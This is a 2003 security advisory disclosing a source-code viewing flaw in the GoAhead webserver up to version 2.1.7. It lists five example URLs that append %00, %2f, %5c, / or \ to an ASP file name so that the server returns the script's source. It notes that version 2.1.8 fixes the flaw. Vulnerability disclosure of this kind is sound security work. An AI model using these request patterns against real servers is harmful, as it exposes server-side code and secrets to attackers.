#######################################################################

                             Luigi Auriemma

Application:  Goahead webserver
              http://www.goahead.com/webserver/webserver.htm
Versions:     <= 2.1.7
Platforms:    multiplatform
Bug:          source code viewing of server side script files
Exploitation: remote with browser
Date:         17 Dec 2003
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

NOTE (23 Dec 2003): some days after the releasing of the advisory I
     have seen that the same bug was reported in August 2002 by
     Richard Brain (richard.brain@procheckup.com) to some mailing-lists
     but not to Bugtraq where in fact there was no BID or mail in
     archive about this vulnerability, that's why I  have not seen
     it... sorry.
     The bad thing is that Goahead has not seen (or has not patched)
     this bug for over one year 8-(


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Goahead webserver is an embedded OpenSource server that can be build on
a lot of systems (CE, Ecos, GNU/Linux, Lynx, MacOS, NW, QNX4, VXWORKS,
Win32 and others).
It is supported by a lot of companies that use it for their projects
and it is also used like "base" for other webservers, furthermore it
has been developed for be very tiny and to run on embedded systems.


#######################################################################

======
2) Bug
======


Goahead webserver supports the usage of ASP files that are "executed"
when called by the client's browser.
However exists a vulnerability letting the client to view the source
code of each ASP file (or other server side scripts excluded the
cgi-bin files) simply adding some chars or URL encoded chars after the
name of the requested file:

%00, %2f, %5c, / and \


#######################################################################

===========
3) The Code
===========


http://server/asp.asp%00
http://server/asp.asp%2f
http://server/asp.asp%5c
http://server/asp.asp/
http://server/asp.asp\


#######################################################################

======
4) Fix
======


Version 2.1.8 released the 8th Dec 2003


#######################################################################